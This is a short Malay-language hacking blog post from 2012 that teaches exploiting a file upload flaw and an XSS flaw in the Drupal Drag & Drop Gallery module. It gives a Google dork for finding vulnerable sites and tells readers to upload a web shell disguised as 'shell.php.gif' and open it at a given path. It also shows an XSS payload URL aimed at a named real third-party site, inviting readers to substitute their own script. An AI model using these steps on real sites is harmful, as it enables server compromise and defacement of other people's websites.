Monday, 25 June 2012

Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability



Assalamualaikum dan salam sejahtera.Lama aku tak post tentang exploit upload2 kan?Ok jom aku ajar exploit file upload baru.exploit ni jugak vulnerable terhadap XSS ^.^
Jom mula.

1. Mula-mula search google dork ni :
inurl:/sites/all/modules/dragdrop_gallery/



2. Pilih salah satu website.Seterusnya sediakan shell korang dalam bentuk shell.php.gif


kemudian UPLOAD!


3. Untuk access shell pergi sini :
http://localhost/drupal/sites/all/modules/dragdrop_gallery/shell.php.gif



4. DONE!

5. Ok sekarang untuk XSS pulak macam ni :
http://illinoispoisoncenter.org/sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=<marquee>Rea_pErz+Was+Here</marquee>

6. Tukar script warna merah tu kepada script korang sendiri!SIAP!


Ok itu saja Assalamualaikum....

Item Reviewed: Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com